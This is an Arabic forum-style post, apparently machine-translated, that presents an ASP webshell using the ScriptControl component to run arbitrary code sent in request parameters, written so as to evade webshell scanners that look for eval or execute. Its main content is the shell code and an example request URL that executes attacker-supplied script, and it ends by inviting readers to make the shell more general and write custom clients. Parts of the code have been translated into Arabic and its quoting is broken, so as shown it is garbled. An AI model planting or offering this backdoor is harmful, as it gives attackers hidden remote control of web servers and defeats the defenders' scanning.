لقد كنت دائمًا أشعر بالفضول، لماذا يوجد تقييم أو تنفيذ في العميل بغض النظر عن المكان الذي أختبئ فيه، يمكن للمسؤول أن يركلني باستخدام أي ماسح ضوئي لـ XX webshell. لقد قمت اليوم بإعادة البحث في مكون ScriptControl في VB ووجدت أنه يمكن استدعاؤه أيضًا في asp. لقد درست الطريقة وناقشتها لاحقًا مع lcx. لقد حصلت على الكود التالي وأود أن أشكر كبار السن على توجيهاتهم، هاها.
الكود بسيط جدًا، لذا لن أشرحه كثيرًا لتجنب أن يوبخني أي شخص بسبب التظاهر.
انسخ رمز الكود كما يلي:
<%
تعيين o = Server.CreateObject(ScriptControl)
o.language = vbscript
o.addcode(Request(SubCode)) 'المعلمة SubCode كرمز العملية
o.run e,Server,Response,Request,Application,Session,Error 'استدعها باسم المعلمة e، وادفع 6 كائنات أساسية كمعلمات في نفس الوقت
'مثال الاتصال:
'http://localhost/tmp.asp?SubCode=sub%20e%28Server,Response,Request,Application,Session,Error%29%20eval%28request%28%22v%22%29%29%20end%20sub&v=response .write%28server.mappath%28%22tmp.asp%22%29%29
%>
لاحظ أنه على الرغم من أنه يمكن استخدامه، فقد وجدت التجربة أنه يمكن استخدام عميل Lake2 فقط. آمل أن يتمكن شخص ما من الخروج وجعل الأمر أكثر عمومية. الكالينجيون. سيكون من الجيد أيضًا أن تكتب عميلك المخصص.